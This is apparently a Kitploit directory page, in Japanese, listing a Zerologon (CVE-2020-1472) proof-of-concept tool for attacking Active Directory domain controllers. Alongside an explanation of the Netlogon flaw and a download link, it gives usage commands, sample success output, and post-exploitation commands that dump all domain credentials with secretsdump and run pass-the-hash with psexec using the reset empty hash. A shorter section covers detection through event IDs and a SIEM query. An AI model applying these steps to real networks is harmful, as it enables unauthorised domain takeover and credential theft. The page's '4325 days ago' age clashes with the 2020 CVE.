Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ZeroLogon-PoC-DC-Pwn — Zerologon (CVE-2020-1472) 概念実証(PoC)アプリケーション - 重大なActive Directoryの脆弱性を悪用するツール。 | Kitploit
ツール/GitHubGitHub/mods20hh/zerologon-poc-dc-pwn
特権昇格パスワード攻撃脆弱性分析エクスプロイトポストエクスプロイトペネトレーションテスト論文と研究学習と教育レッドチーミング
GitHubmods20hh/zerologon-poc-dc-pwn

ZeroLogon-PoC-DC-Pwn

Zerologon (CVE-2020-1472) 概念実証(PoC)アプリケーション - 重大なActive Directoryの脆弱性を悪用するツール。

4325日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

Zerologon(CVE-2020-1472)

概要

このプロジェクトは、最も重大なActive Directoryセキュリティ脆弱性の1つである**Zerologon脆弱性(CVE-2020-1472)**の実装です。この脆弱性により、認証されていない攻撃者がドメインコントローラーのマシンアカウントパスワードをリセットすることで、Active Directoryドメイン全体を侵害することができます。

CVSSスコア:10.0(重大)

Zerologonとは?

Zerologonは、MicrosoftのNetlogonリモートプロトコル(MS-NRPC)における暗号上の欠陥です。この脆弱性は、Netlogonがゼロにハードコードされた初期化ベクトル(IV)でAES-CFB8暗号化を使用する方法に存在します。

技術的な概要:

  • Netlogonプロトコルはチャレンジ・レスポンス認証メカニズムを使用します
  • 不適切な暗号実装により、全ゼロのチャレンジは1/256の確率で有効な認証を生成します
  • 攻撃者は約2000回の認証試行を送信することで、この欠陥を確実に悪用できます
  • 認証に成功すると、攻撃者はドメインコントローラーのマシンアカウントパスワードを既知の値(空のハッシュ)にリセットできます

動作の仕組み

root@kitploit:~
1. Target Selection
   └─> Identify Domain Controller (FQDN, NetBIOS name, machine account)

2. Challenge Phase (I_NetServerReqChallenge)
   └─> Send all-zero client challenge (0x0000000000000000)
   └─> Receive server challenge

3. Authentication Phase (I_NetServerAuthenticate2)
   └─> Attempt authentication with null credentials
   └─> Repeat until successful (~1/256 success rate per attempt)

4. Password Reset Phase (I_NetServerPasswordSet2)
   └─> Reset DC machine account password to empty
   └─> New NT hash: 31d6cfe0d16ae931b73c59d7e0c089c0 (empty password)

5. Post-Exploitation
   └─> Use Pass-the-Hash with empty credentials
   └─> Full domain compromise achieved

プロジェクトのビルド

前提条件

  • Windows開発環境(Windows 10/11)
  • Visual Studio 2022
  • Windows SDK

コンパイル

Visual Studioを使用する場合:

root@kitploit:~
1. Open Visual Studio
2. Select **Build Solution** from the **Build** menu.

使用方法

root@kitploit:~
Zerologon.exe <DC_FQDN> <DC_NetBIOS_Name> <Machine_Account_Name>

例:

root@kitploit:~
Zerologon.exe DC01.corp.example.com DC01 DC01$

パラメータ:

  • DC_FQDN: 対象ドメインコントローラーの完全修飾ドメイン名(FQDN)
  • DC_NetBIOS_Name: DCのNetBIOS名(通常はホスト名)
  • Machine_Account_Name: マシンアカウント名($で終わる必要があります)

期待される出力:

悪用に成功した場合:

root@kitploit:~
[+] Targeting Domain Controller:
    FQDN           : DC01.corp.example.com
    NetBIOS Name   : DC01
    Machine Account: DC01$

[+] SUCCESS: Machine account password reset to empty!
[+] Now use Pass-the-Hash with:
      .\DC01$:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
[+] Then run: secretsdump.py -just-dc <domain>/<dc_account>@<dc_ip>

悪用に失敗した場合(パッチ適用済みシステム):

root@kitploit:~
[-] Attack failed after 2000 attempts. Target likely patched.

ポストエクスプロイト

DCパスワードのリセットに成功した後、以下が可能です:

  1. ドメイン資格情報のダンプ:
root@kitploit:~
secretsdump.py -no-pass -just-dc 'DOMAIN/DC01$'@192.168.1.10
  1. Pass-the-Hash認証:
root@kitploit:~
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC01$'@DC01

検出

ネットワークベースの検出:

  • 単一の送信元からの複数回のNetlogon認証失敗試行
  • MS-NRPCトラフィックにおける異常なパターン
  • ZerologonエクスプロイトのためのIDS/IPSシグネチャ

ログベースの検出:

root@kitploit:~
Event Viewer → Windows Logs → System
- Event ID 5827: Multiple password validation failures
- Event ID 5829: Secure channel reset

SIEMクエリ:

root@kitploit:~
source="WinEventLog:System" EventCode=5827 OR EventCode=5829
| stats count by Computer, SourceIP
| where count > 100

免責事項

このツールは教育目的および許可されたセキュリティ研究目的のみで提供されます。

作者は、このコードの不正使用について一切の責任を負いません。

参考文献

公式リソース:

  • CVE-2020-1472 - NIST
  • Microsoftセキュリティアドバイザリ
  • Secura調査レポート

技術分析:

  • Microsoft Netlogonプロトコル仕様
  • Zerologon技術詳細解説

ツール:

  • Impacket Toolkit - エクスプロイト後の操作に使用
  • Mimikatz - 資格情報の抽出

ライセンス

このプロジェクトはMITライセンスの下でライセンスされています。詳細については、LICENSEファイルを参照してください。

ツールをダウンロード